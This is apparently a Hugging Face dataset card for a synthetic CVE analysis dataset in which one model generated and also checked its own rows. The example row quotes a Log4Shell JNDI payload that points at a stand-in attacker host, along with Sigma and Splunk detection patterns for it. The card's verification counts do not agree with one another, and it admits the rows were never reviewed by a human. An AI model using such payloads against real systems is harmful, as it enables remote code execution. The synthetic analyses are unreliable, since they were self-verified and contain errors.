sh111111111111111/cve-analysis

Hugging Face | Updated 2026-03-18 | Indexed 2026-03-29
Download link:
https://hf-mirror.com/datasets/sh111111111111111/cve-analysis
Resource description:
---
language:
- en
license: apache-2.0
tags:
- cybersecurity
- vulnerability-analysis
- cve
- security
- detection-engineering
- threat-intelligence
- cvss
- sigma-rules
- splunk
- mitre-attack
- distillation
size_categories:
- 1K<n<10K
task_categories:
- text-generation
- question-answering
pretty_name: CVE & Vulnerability Analysis Dataset
---

# CVE & Vulnerability Analysis Dataset

[![Rows](https://img.shields.io/badge/rows-9,999-green.svg)](https://img.shields.io/badge/rows-9,999-green.svg)
[![Sectors](https://img.shields.io/badge/sectors-20-blue.svg)](https://img.shields.io/badge/sectors-20-blue.svg)
[![Verified](https://img.shields.io/badge/verified-100%25-brightgreen.svg)](https://img.shields.io/badge/verified-100%25-brightgreen.svg)
[![CVEs Referenced](https://img.shields.io/badge/CVEs_referenced-60+-blue.svg)](https://img.shields.io/badge/CVEs_referenced-60+-blue.svg)

A comprehensive vulnerability analysis and CVE research dataset. Each row is a detailed security analysis covering root cause, exploitation methodology, detection rules (Sigma/Splunk/Suricata), CVSS v3.1 scoring, MITRE ATT&CK mapping, and remediation guidance, verified by the same model in an independent review pass.

---

## Overview

This dataset contains **9,999 structured vulnerability analyses** across 20 security domains. Unlike simple CVE descriptions, each entry is a full-depth analysis of the kind a vulnerability researcher or security engineer would produce, including proof-of-concept walkthroughs, language-specific code examples, production detection rules, and prioritized remediation plans.

Every prompt references real CVEs, real technologies, and real-world incidents. Responses include detection rules in valid Sigma YAML and Splunk SPL syntax, CVSS v3.1 vector strings with metric-by-metric justification, and MITRE ATT&CK technique mappings.
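As a rough illustration of what a well-formed CVSS v3.1 vector string implies, the sketch below parses a base vector and recomputes its base score. It is not part of the dataset tooling: the function names (`parse_vector`, `roundup`, `base_score`) are hypothetical, and the weights and equations are taken from the public CVSS v3.1 specification rather than from this dataset. The parser accepts vectors with or without the `CVSS:3.1/` prefix, since the examples in this card omit it.

```python
# Base metric weights from the CVSS v3.1 specification (not from this dataset).
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "UI": {"N": 0.85, "R": 0.62},
    "C": {"H": 0.56, "L": 0.22, "N": 0.0},
    "I": {"H": 0.56, "L": 0.22, "N": 0.0},
    "A": {"H": 0.56, "L": 0.22, "N": 0.0},
}
# Privileges Required depends on Scope (U = unchanged, C = changed).
PR_WEIGHTS = {
    "U": {"N": 0.85, "L": 0.62, "H": 0.27},
    "C": {"N": 0.85, "L": 0.68, "H": 0.5},
}
BASE_METRICS = ("AV", "AC", "PR", "UI", "S", "C", "I", "A")


def parse_vector(vector):
    """Split a base vector into a metric dict, raising ValueError if malformed."""
    parts = vector.strip().split("/")
    if parts[0].startswith("CVSS:"):  # optional version prefix
        parts = parts[1:]
    metrics = {}
    for part in parts:
        name, sep, value = part.partition(":")
        if not sep or name in metrics:
            raise ValueError(f"malformed or duplicate metric: {part!r}")
        metrics[name] = value
    if set(metrics) != set(BASE_METRICS):
        raise ValueError(f"expected exactly the metrics {BASE_METRICS}")
    if metrics["S"] not in PR_WEIGHTS or metrics["PR"] not in PR_WEIGHTS["U"]:
        raise ValueError("invalid S or PR value")
    for name, table in WEIGHTS.items():
        if metrics[name] not in table:
            raise ValueError(f"invalid value for {name}: {metrics[name]!r}")
    return metrics


def roundup(value):
    """Round up to one decimal place, as defined in the v3.1 specification."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (scaled // 10000 + 1) / 10.0


def base_score(vector):
    """Compute the CVSS v3.1 base score for a base vector string."""
    m = parse_vector(vector)
    changed = m["S"] == "C"
    iss = 1 - (
        (1 - WEIGHTS["C"][m["C"]])
        * (1 - WEIGHTS["I"][m["I"]])
        * (1 - WEIGHTS["A"][m["A"]])
    )
    if changed:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    else:
        impact = 6.42 * iss
    exploitability = (
        8.22
        * WEIGHTS["AV"][m["AV"]]
        * WEIGHTS["AC"][m["AC"]]
        * PR_WEIGHTS[m["S"]][m["PR"]]
        * WEIGHTS["UI"][m["UI"]]
    )
    if impact <= 0:
        return 0.0
    total = impact + exploitability
    return roundup(min(1.08 * total if changed else total, 10))


print(base_score("AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"))  # 9.8
print(base_score("AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"))  # 10.0
```

A check like this only confirms that a vector is syntactically valid and that a stated score matches the vector; it says nothing about whether the chosen metric values are the right ones for a given CVE.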

## Dataset Statistics

| Metric | Value |
|--------|-------|
| **Total rows** | 9,999 |
| **Sectors** | 20 vulnerability categories |
| **Verification pass rate** | 100% of output rows (9,999/9,999) |
| **Unique verified prompts** | 8,150 |
| **Verification rounds** | 20 |
| **Real CVEs referenced** | 60+ unique CVEs across all prompts |

## What's in Each Row

Every analysis covers seven dimensions:

1. **Root Cause Analysis**: Code-level explanation of the vulnerability mechanism, with vulnerable code examples
2. **Affected Versions**: Version matrix, configurations, and environmental factors
3. **Exploitation Methodology**: Step-by-step exploitation with prerequisites, tooling, and PoC walkthrough
4. **Detection Engineering**: Sigma rules, Splunk SPL queries, Suricata/Snort signatures, YARA rules, and host-based indicators
5. **CVSS v3.1 Scoring**: Complete vector string (e.g. AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) with per-metric justification
6. **MITRE ATT&CK Mapping**: Technique IDs and tactic placement
7. **Remediation**: Patches, workarounds, compensating controls, and verification steps

## Sector Coverage

| Sector | Rows | Focus |
|--------|------|-------|
| web_application_cves | ~615 | SQLi, XSS, SSRF, SSTI, XXE, HTTP smuggling in web frameworks |
| remote_code_execution_cves | ~615 | RCE via deserialization, injection, file upload, JNDI across all stacks |
| operating_system_cves | ~615 | Linux kernel, Windows kernel, macOS, privilege escalation primitives |
| authentication_bypass_cves | ~515 | JWT, OAuth, SAML, session management, MFA bypass techniques |
| memory_corruption_cves | ~515 | Buffer overflow, use-after-free, heap corruption, type confusion |
| privilege_escalation_cves | ~515 | Kernel exploits, SUID/sudo abuse, container escape, IAM escalation |
| injection_cves | ~515 | Command, LDAP, NoSQL, SpEL, OGNL, expression language injection |
| cloud_service_cves | ~515 | AWS/Azure/GCP misconfig, SSRF to metadata, IAM abuse, S3 exposure |
| network_protocol_cves | ~515 | TLS, DNS, BGP, Kerberos, SMB, SNMP protocol implementation flaws |
| supply_chain_cves | ~515 | Dependency confusion, typosquatting, CI/CD pipeline attacks, registry poisoning |
| access_control_cves | ~515 | IDOR, broken access control, RBAC bypass, forced browsing |
| api_cves | ~515 | BOLA, BFLA, GraphQL abuse, gRPC reflection, mass assignment, rate limiting |
| cryptographic_cves | ~515 | Padding oracle, weak TLS, hardcoded keys, broken RNG, cipher downgrade |
| information_disclosure_cves | ~515 | Stack traces, debug endpoints, .env exposure, error-based data leaks |
| container_k8s_cves | ~415 | Container escape, K8s RBAC bypass, pod security, etcd/kubelet access |
| database_cves | ~415 | SQL injection chains, stored procedure abuse, DB privilege escalation |
| deserialization_cves | ~415 | Java, .NET, Python pickle, PHP, Ruby deserialization to RCE |
| iot_firmware_cves | ~415 | Hardcoded credentials, UART/JTAG, firmware extraction, protocol abuse |
| denial_of_service_cves | ~415 | ReDoS, HTTP/2 rapid reset, XML bomb, amplification, algorithmic complexity |
| zero_day_analysis | ~415 | Variant analysis, patch diffing, fuzzing triage, exploit primitive identification |

## Real CVEs Referenced

Prompts are grounded in real-world vulnerabilities, including:

| CVE | Name | Year | Severity |
|-----|------|------|----------|
| CVE-2021-44228 | Log4Shell | 2021 | CRITICAL |
| CVE-2017-5638 | Apache Struts RCE | 2017 | CRITICAL |
| CVE-2023-34362 | MOVEit Transfer SQLi | 2023 | CRITICAL |
| CVE-2020-1472 | Zerologon | 2020 | CRITICAL |
| CVE-2021-34527 | PrintNightmare | 2021 | CRITICAL |
| CVE-2022-22965 | Spring4Shell | 2022 | CRITICAL |
| CVE-2024-3400 | PAN-OS Command Injection | 2024 | CRITICAL |
| CVE-2021-26855 | ProxyLogon | 2021 | CRITICAL |
| CVE-2014-0160 | Heartbleed | 2014 | HIGH |
| CVE-2021-4034 | PwnKit | 2021 | HIGH |
| CVE-2024-1086 | nf_tables UAF | 2024 | HIGH |
| CVE-2023-4911 | Looney Tunables | 2023 | HIGH |
| CVE-2024-21626 | Leaky Vessels (runc) | 2024 | HIGH |
| CVE-2023-44487 | HTTP/2 Rapid Reset | 2023 | HIGH |
| ... | *60+ total unique CVEs* | | |

## How It Was Made

### Prompt Generation

10,000 prompts were generated across 20 sectors using a template × variation engine with 8 analysis template types:

1. **CVE Deep Dive**: Full analysis of a specific real CVE
2. **Vulnerability Class Analysis**: Analysis of a vulnerability type in a specific technology
3. **Comparative Analysis**: Cross-technology comparison of vulnerability manifestation
4. **Incident-Driven Analysis**: Industry-specific vulnerability assessment report
5. **Exploit Development Analysis**: Exploit primitive and weaponization assessment
6. **Patch Analysis**: Patch completeness, regression risk, and variant analysis
7. **Vulnerability Chaining**: Compound exploitation and chain-breaking defense
8. **Triage & Prioritization**: Scanner validation, environmental CVSS, and SLA recommendation

To ensure diversity, the template variables include 12 programming languages, 14 industries, 10 deployment environments, and 60+ real CVE references.

### Generation Pipeline

Prompts were processed through [TeichAI/datagen](https://github.com/TeichAI/datagen) using `openrouter/hunter-alpha` (1T parameter model) via the OpenRouter API. The custom system prompt enforces:

- Syntactically correct detection rules (Sigma YAML, Splunk SPL, Snort/Suricata)
- Valid CVSS v3.1 vector strings
- Real MITRE ATT&CK technique IDs
- Minimum 1,000 words per analysis
- Accurate CVE IDs and version information

**Generation challenges:** The initial 10,000-prompt batch hit OpenRouter's 400 req/min rate limit at 40 concurrent requests, resulting in 6,539 failures on the first pass. The resume system regenerated all missing prompts across subsequent attempts.

### Self-Verification

Every generated analysis was verified by sending it back to the same model in a **fresh, independent chat** with a strict verification rubric checking for:

| Check | Description |
|-------|-------------|
| **WRONG_SYNTAX** | Incorrect command flags, invalid detection rule syntax |
| **HALLUCINATED_DATA** | Fabricated CVE IDs, impossible version numbers, fake tool names |
| **SECURITY_ERROR** | Fundamentally wrong methodology or misattributed vulnerability type |
| **SHALLOW** | Insufficient depth, missing required analysis sections |
| **MALFORMED_OUTPUT** | Structural issues in the response |
| **IMPOSSIBLE_CHAIN** | Logically impossible exploitation sequences |

The verification loop:

1. Verify all unverified rows (40 concurrent)
2. PASS → locked in persistent set (never re-checked)
3. FAIL → answer deleted, prompt re-queued for regeneration
4. ERROR (API timeout) → retry verification only (answer kept)
5. Repeat until all pass or max retries exhausted

**Results after 20 rounds:**

| Round | Verified | Regenerated | To Re-verify |
|-------|----------|-------------|--------------|
| 1 | +1,906 | 879 | 676 |
| 2 | +4,417 | 2,055 | 37 |
| 3 | +1,450 | 722 | 22 |
| 4 | +428 | 300 | 5 |
| 5 | +185 | 128 | 3 |
| 6 | +88 | 45 | 1 |
| 7-14 | +76 | diminishing | 0-1 |
| 15-20 | +2 | 1 stubborn prompt | 0 |
| **Total** | **8,150 unique** | | |

One prompt never passed verification across 20 regeneration attempts and was removed. Final dataset: **9,999 rows, 100% verified**.

### Cumulative Verification Issues Found (Across All 20 Rounds)

These counts are cumulative; most issues were corrected on subsequent regeneration attempts:

| Issue Type | Count | Description |
|-----------|-------|-------------|
| HALLUCINATED_DATA | 2,210 | Fabricated versions, fake CVEs, impossible configurations |
| MALFORMED_OUTPUT | 1,313 | Structural issues in response format |
| SECURITY_ERROR | 983 | Wrong methodology, misattributed vulnerability type |
| SHALLOW | 884 | Insufficient depth, missing analysis sections |
| WRONG_SYNTAX | 432 | Invalid command flags, broken detection rule syntax |
| CODE | 158 | Code example issues (wrong language, syntax errors) |
| IMPOSSIBLE_CHAIN | 109 | Logically impossible exploitation sequences |

## Data Format

Each row is a JSONL object with system/user/assistant messages plus metadata:

```json
{
  "messages": [
    {
      "role": "system",
      "content": "You are a senior vulnerability researcher and security analyst..."
    },
    {
      "role": "user",
      "content": "Provide a comprehensive vulnerability analysis of CVE-2021-44228 (Log4Shell) affecting Apache Log4j 2. Include: 1. ROOT CAUSE... 2. AFFECTED VERSIONS... 3. EXPLOITATION... 4. DETECTION: SIEM detection rules (Splunk SPL + Sigma)... 5. CVSS SCORING..."
    },
    {
      "role": "assistant",
      "content": "## Root Cause Analysis\n\nCVE-2021-44228 exploits the JNDI lookup feature in Apache Log4j 2.0-beta9 through 2.14.1. When a log message contains a string like `${jndi:ldap://attacker.com/payload}`, the Log4j library performs a JNDI lookup...\n\n## Detection Rules\n\n### Sigma Rule\n```yaml\ntitle: Log4Shell JNDI Exploitation Attempt\nstatus: production\nlogsource:\n  category: webserver\n  product: apache\ndetection:\n  selection:\n    cs-uri|contains:\n      - '${jndi:'\n      - '${${lower:j}ndi:'\n  condition: selection\nlevel: critical\n```\n\n### Splunk SPL\n```spl\nindex=web sourcetype=access_combined\n| regex _raw=\"\\$\\{(j|\\$\\{lower:j\\})ndi:\"\n| stats count by src_ip, uri_path, status\n| where count > 3\n```\n\n## CVSS v3.1\nVector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H = 10.0\n- Attack Vector (AV:N): Network-accessible, no physical access required\n- Attack Complexity (AC:L): No special conditions needed...\n..."
    }
  ],
  "sector": "remote_code_execution_cves",
  "verified": true
}
```

## Usage

```python
from datasets import load_dataset

# Repository ID as given in the Citation section of this card
dataset = load_dataset("sh111111111111111/cve-analysis")

# All rows are verified
train = dataset["train"]
print(f"Total: {len(train)} rows")

# Filter by sector
web_cves = train.filter(lambda x: x.get("sector") == "web_application_cves")
cloud_cves = train.filter(lambda x: x.get("sector") == "cloud_service_cves")

# Extract analysis content (messages are ordered system, user, assistant)
for row in train:
    user_prompt = row["messages"][1]["content"]
    analysis = row["messages"][2]["content"]
```

### Use Cases

- **Fine-tuning vulnerability analysis models**: Train AI to produce structured CVE analyses
- **Detection engineering training**: Generate Sigma/Splunk/Suricata rules for vulnerability classes
- **Security analyst copilots**: Train models that help SOC teams triage and respond to vulnerabilities
- **CVSS scoring automation**: Train models to produce justified CVSS vector strings
- **Threat intelligence enrichment**: Auto-generate vulnerability context for threat feeds
- **Security education**: Teach vulnerability analysis methodology with real-world grounding

## Technical Details

| Component | Detail |
|-----------|--------|
| Teacher model | openrouter/hunter-alpha (1T parameters) |
| API | OpenRouter (https://openrouter.ai/api/v1) |
| Concurrency | 40 simultaneous API calls |
| Reasoning effort | High |
| Rate limit encountered | 400 req/min |
| Generation time | ~13 hours (initial pass + regeneration across 20 attempts) |
| Verification rounds | 20 |
| Total API cost | $0 (free-tier model) |

## Limitations

- **Self-verification bias**: The same model generated and verified the analyses. Although verification uses a fresh chat context with a strict rubric, inherent model biases persist.
- **No human expert review**: All 9,999 analyses were verified automatically. Detection rules and CVSS scores have not been validated by human security engineers.
- **CVE accuracy**: Although prompts reference real CVEs, some generated analyses may contain subtle inaccuracies in version numbers, dates, or technical details that passed automated verification.

## Citation

```bibtex
@dataset{cve_analysis_2026,
  title={CVE & Vulnerability Analysis Dataset},
  year={2026},
  url={https://huggingface.co/datasets/sh111111111111111/cve-analysis},
  note={9,999 verified vulnerability analyses across 20 sectors with detection rules and CVSS scoring}
}
```

## License

Apache 2.0
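
Because the Limitations section notes that no human expert has reviewed the rows, a reader may want to pull out the parts of a row that are easiest to spot-check by hand. The following is a minimal sketch under the row layout shown in the Data Format section; `summarize_row` and the sample row are hypothetical and are not part of the dataset or of any library. It collects the CVE IDs mentioned in the prompt and in the analysis, and groups fenced code blocks (Sigma YAML, SPL, and so on) by their language tag.

```python
import re

# Built at runtime so the fence marker never starts a line in this example.
FENCE = "`" * 3
CVE_ID = re.compile(r"\bCVE-\d{4}-\d{4,}\b")
CODE_BLOCK = re.compile(FENCE + r"([\w+-]*)\n(.*?)" + FENCE, re.DOTALL)


def summarize_row(row):
    """Collect the pieces of one row that a human reviewer may want to check."""
    messages = {m["role"]: m["content"] for m in row["messages"]}
    analysis = messages["assistant"]
    blocks = {}
    for lang, body in CODE_BLOCK.findall(analysis):
        blocks.setdefault(lang or "plain", []).append(body.strip())
    prompt_cves = sorted(set(CVE_ID.findall(messages["user"])))
    analysis_cves = sorted(set(CVE_ID.findall(analysis)))
    return {
        "sector": row.get("sector"),
        "prompt_cves": prompt_cves,
        "analysis_cves": analysis_cves,
        # CVE IDs that appear in the answer but not in the prompt deserve a closer look.
        "extra_cves": sorted(set(analysis_cves) - set(prompt_cves)),
        "code_blocks": blocks,
    }


# Hypothetical, heavily shortened row in the documented format.
sample = {
    "messages": [
        {"role": "system", "content": "You are a senior vulnerability researcher..."},
        {"role": "user", "content": "Analyze CVE-2021-44228 (Log4Shell)."},
        {
            "role": "assistant",
            "content": "## Root Cause Analysis\nCVE-2021-44228 exploits JNDI lookups.\n\n"
            + FENCE + "yaml\ntitle: Log4Shell JNDI Exploitation Attempt\n" + FENCE + "\n",
        },
    ],
    "sector": "remote_code_execution_cves",
    "verified": True,
}

summary = summarize_row(sample)
print(summary["prompt_cves"], list(summary["code_blocks"]))
```

The extracted blocks can then be handed to whatever validator a reviewer trusts for that rule language; the sketch only locates them and does not judge their correctness.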
Provider:
sh111111111111111